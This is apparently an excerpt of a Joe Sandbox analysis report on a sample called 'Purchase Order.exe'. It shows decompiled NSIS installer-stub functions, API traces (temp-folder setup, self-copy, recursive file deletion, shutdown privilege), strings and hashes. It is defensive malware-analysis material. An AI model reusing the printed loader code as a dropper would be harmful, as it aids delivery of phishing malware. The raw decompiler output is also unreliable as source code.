										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}

0x0040353b
0x0040353c
0x00403543
0x00403546
0x0040354d
0x00403550
0x00403563
0x00403569
0x0040356c
0x0040356f
0x0040357d
0x00403585
0x00403590
0x004035a9
0x004035ab
0x004035b3
0x004035b3
0x004035be
0x004035c0
0x004035c0
0x004035d5
0x004035fa
0x00403608
0x0040360b
0x00403612
0x00403619
0x00403619
0x00403612
0x0040361b
0x00403620
0x00403621
0x0040362d
0x00403631
0x00403638
0x00403646
0x0040364b
0x00403652
0x00403656
0x0040365a
0x0040365c
0x0040365c
0x0040365a
0x00403663
0x0040366a
0x00403670
0x00403688
0x00403698
0x0040369d
0x004036a3
0x004036aa
0x004036b1
0x004036b3
0x004036b4
0x004036be
0x004036c5
0x004036c7
0x004036c9
0x004036c9
0x004036dc
0x004036de
0x004037d8
0x004037d8
0x004037db
0x004037de
0x00000000
0x00000000
0x004036e8
0x004036e9
0x004036ec
0x004036f5
0x004036f5
0x004036f8
0x004036fb
0x004036fe
0x00403701
0x00403701
0x00403701
0x00403702
0x00403706
0x004037c6
0x004037cf
0x004037d1
0x004037d4
0x004037d7
0x004037d7
0x004037d7
0x00000000
0x0040370c
0x0040370d
0x0040370e
0x00403712
0x0040372c
0x00403733
0x00403746
0x00403747
0x0040375c
0x00403761
0x00403763
0x00403765
0x00403781
0x00403788
0x0040379b
0x0040379c
0x004037b1
0x004037b7
0x004037b9
0x004037bb
0x004037c3
0x004037c5
0x00000000
0x004037c5
0x004037bf
0x004037c1
0x004037e6
0x004037ea
0x004037f3
0x004037f8
0x004037fe
0x00403809
0x0040380b
0x00403810
0x00403812
0x0040386a
0x0040386f
0x00403878
0x0040387f
0x00403882
0x00403a59
0x00403a59
0x00403a5e
0x00403a67
0x00403a84
0x00403afc
0x00403afc
0x00403b04
0x00403b06
0x00403b06
0x00403b0c
0x00403b0c
0x00403a9b
0x00403aa7
0x00403ab8
0x00403abf
0x00403ac6
0x00403ac6
0x00403ace
0x00403ada
0x00403ae8
0x00403af3
0x00000000
0x00000000
0x00000000
0x00403adc
0x00403adc
0x00403add
0x00403adf
0x00403ae0
0x00403ae1
0x00403ae6
0x00403af5
0x00403af7
0x00000000
0x00403af7
0x00000000
0x00403ae6
0x00403ada
0x00403a71
0x00403a78
0x00403a78
0x0040388e
0x00403935
0x00403935
0x00403941
0x00000000
0x00403941
0x0040389f
0x004038a7
0x004038f9
0x004038f9
0x004038ff
0x00403906
0x00403954
0x00403956
0x0040395b
0x0040395d
0x00403965
0x00403965
0x00403970
0x00403975
0x0040397c
0x00403982
0x00403984
0x00403a57
0x00403a57
0x00403a57
0x00000000
0x0040398a
0x0040398a
0x0040398c
0x0040398d
0x00403996
0x0040398f
0x0040398f
0x0040398f
0x0040399c
0x004039a4
0x004039ab
0x004039b3
0x004039b3
0x004039c0
0x004039cc
0x004039d6
0x004039d6
0x004039d8
0x004039df
0x004039e9
0x004039f5
0x004039fb
0x00403a01
0x00403a04
0x00403a0e
0x00403a14
0x00403a16
0x00403a1a
0x00403a2b
0x00403a31
0x00403a36
0x00403a38
0x00403a3b
0x00403a41
0x00403a41
0x00403a38
0x00403a16
0x00403a44
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a52
0x00000000
0x00403a52
0x00403984
0x00403908
0x0040390b
0x0040390f
0x00403914
0x00403916
0x00000000
0x00000000
0x00403922
0x0040392d
0x00403932
0x00000000
0x00403932
0x004038b0
0x004038c8
0x004038d9
0x004038da
0x004038de
0x004038e0
0x004038ee
0x004038f5
0x00000000
0x00000000
0x00000000
0x004038f5
0x004038f7
0x00000000
0x004038f7
0x0040381a
0x00403826
0x0040382b
0x00403830
0x00403832
0x00000000
0x00000000
0x0040383a
0x00403842
0x00403853
0x0040385b
0x0040385d
0x00403862
0x00403864
0x00000000
0x00000000
0x00000000
0x00403864
0x00000000
0x004037c1
0x0040376a
0x0040376c
0x00000000
0x00000000
0x0040376e
0x00403772
0x00403776
0x0040377d
0x0040377d
0x0040377d
0x0040377d
0x00000000
0x0040377d
0x00403778
0x0040377b
0x00000000
0x00000000
0x00000000
0x0040377b
0x00403714
0x00403718
0x0040371b
0x00403722
0x00403722
0x00000000
0x00403722
0x0040371d
0x00403720
0x00000000
0x00000000
0x00000000
0x00403720
0x00000000
0x00000000
0x00000000
0x004036ee
0x004036ee
0x004036ef
0x004036f0
0x004036f0
0x00000000
0x004036ee
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order.exe",00000020,"C:\Users\user\Desktop\Purchase Order.exe",00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403956
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order.exe",00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(C:\Users\user\Desktop\Purchase Order.exe,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
ExitProcess.KERNEL32(?), ref: 00403A59
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

"C:\Users\user\Desktop\Purchase Order.exe", xrefs: 004036A3, 004036A9, 004036BE, 00403895, 004038A1, 004038EF, 004038F9
C:\Users\user\Desktop\Purchase Order.exe, xrefs: 00403A09
C:\Users\user\Desktop, xrefs: 00403975, 0040397A, 004039AD
TEMP, xrefs: 0040384E
.tmp, xrefs: 0040396A
~nsu, xrefs: 0040394E
Low, xrefs: 0040383C
1033, xrefs: 0040386A
Error launching installer, xrefs: 004038FF
UXTHEME, xrefs: 0040361B, 00403620, 00403626
C:\Users\user~1\AppData\Local\Temp, xrefs: 004037EE, 0040391D, 004039A4, 004039AE
NSIS Error, xrefs: 0040368E
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
SeShutdownPrivilege, xrefs: 00403AA1
C:\Users\user~1\AppData\Local\Temp, xrefs: 00403928
TMP, xrefs: 00403856
\Temp, xrefs: 00403820

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\Purchase Order.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-4126735853
Opcode ID: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c53
0x00405c58
0x00405c61
0x00405c64
0x00405c6c
0x00405c6f
0x00405c72
0x00405c7a
0x00405c7c
0x00405c7d
0x00000000
0x00405c7d
0x00405c88
0x00405c8b
0x00405c8b
0x00405c8b
0x00405c8f
0x00405ca2
0x00405ca9
0x00405cae
0x00405cb2
0x00405cc2
0x00405cb4
0x00405cba
0x00405cba
0x00405cc7
0x00405ccb
0x00405cd7
0x00405cdd
0x00405ce2
0x00405ce8
0x00405cf3
0x00405cf9
0x00405cfb
0x00405cfe
0x00405da8
0x00405da8
0x00405dac
0x00405dae
0x00405dae
0x00405dae
0x00405dae
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d04
0x00405d04
0x00405d04
0x00405d0c
0x00405d2c
0x00405d34
0x00405d39
0x00405d40
0x00405d5b
0x00405d60
0x00405d62
0x00405d86
0x00405d64
0x00405d64
0x00405d67
0x00405d7b
0x00405d69
0x00405d6c
0x00405d74
0x00405d74
0x00405d67
0x00405d42
0x00405d48
0x00405d4a
0x00405d50
0x00405d50
0x00405d4a
0x00000000
0x00405d40
0x00405d0e
0x00405d16
0x00000000
0x00000000
0x00405d18
0x00405d20
0x00000000
0x00000000
0x00405d22
0x00405d2a
0x00000000
0x00000000
0x00000000
0x00405d8b
0x00405d93
0x00405d99
0x00405d99
0x00405da2
0x00000000
0x00405da2
0x00405ccd
0x00405cd5
0x00000000
0x00000000
0x00000000
0x00405c91
0x00405c91
0x00405c93
0x00405db3
0x00405db5
0x00405db8
0x00405e09
0x00405e09
0x00405e09
0x00405dba
0x00405dbd
0x00405dc8
0x00405dcd
0x00405dcf
0x00000000
0x00000000
0x00405dd2
0x00405dde
0x00405de3
0x00405de5
0x00000000
0x00405e00
0x00405de7
0x00405dea
0x00000000
0x00000000
0x00405def
0x00000000
0x00405df6
0x00405dbf
0x00405dbf
0x00000000
0x00405dbf
0x00405c99
0x00405c9c
0x00000000
0x00000000
0x00000000
0x00405c9c

APIs

DeleteFileW.KERNELBASE(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsbED8A.tmp\*.*,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsbED8A.tmp\*.*,?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsbED8A.tmp\*.*,?,?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsbED8A.tmp\*.*,?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNELBASE(00000000), ref: 00405DA2

Strings

C:\Users\user~1\AppData\Local\Temp\nsbED8A.tmp\*.*, xrefs: 00405CA2, 00405CA8, 00405CB9, 00405CF2
., xrefs: 00405D04
\*.*, xrefs: 00405CB4
., xrefs: 00405D18
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405C56

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsbED8A.tmp\*.*$\*.*
API String ID: 2035342205-1351366092
Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406873 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}

0x0040687e
0x00406887
0x00000000
0x00406894
0x0040688a
0x00000000

APIs

FindFirstFileW.KERNELBASE(772EFAA0,004302B8,C:\,00405F5D,C:\,C:\,00000000,C:\,C:\,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405C69,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNEL32(00000000), ref: 0040688A

Strings

C:\, xrefs: 00406873

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E00406484(L"1033", _t73 & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp";
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc;
								if( *0x433ecc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5);
							_t39 = E0040689A("RichEd20");
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0);
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bf2
0x00403bfb
0x00403c02
0x00403c04
0x00403c18
0x00403c2a
0x00403c33
0x00403c3c
0x00403c43
0x00403c48
0x00403c4f
0x00403c62
0x00403c62
0x00403c6d
0x00403c06
0x00403c06
0x00403c11
0x00403c11
0x00403c72
0x00403c7c
0x00403c85
0x00403c8a
0x00403c9b
0x00403d2d
0x00403d35
0x00403d3e
0x00403d3e
0x00403d54
0x00403d5a
0x00403d68
0x00403de9
0x00403df1
0x00403dfb
0x00403e00
0x00403e06
0x00403e90
0x00403e95
0x00403e97
0x00403eb3
0x00000000
0x00403eb3
0x00403e99
0x00403e9f
0x00403ea7
0x00403ea7
0x00000000
0x00403e9f
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e2d
0x00403e2d
0x00403e38
0x00403e40
0x00403e42
0x00403e44
0x00403e4d
0x00403e50
0x00403e56
0x00403e56
0x00403e75
0x00403e86
0x00000000
0x00403e8b
0x00403df3
0x00403df5
0x00000000
0x00403d6a
0x00403d6a
0x00403d76
0x00403d80
0x00403d86
0x00403d8b
0x00403d9a
0x00403eb8
0x00403eb8
0x00000000
0x00403eb8
0x00403da9
0x00403de4
0x00000000
0x00403de4
0x00403ca1
0x00403ca1
0x00403ca4
0x00403ca6
0x00000000
0x00000000
0x00403cb4
0x00403cc6
0x00403ccb
0x00403cd4
0x00000000
0x00000000
0x00403cda
0x00403cdc
0x00403ce9
0x00403ce9
0x00403cf2
0x00403cf8
0x00403d20
0x00403d28
0x00000000
0x00403d0a
0x00403d0b
0x00403d14
0x00403d1a
0x00403d1b
0x00000000
0x00403d1b
0x00403d16
0x00403d18
0x00000000
0x00000000
0x00000000
0x00403d18
0x00403cf8

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
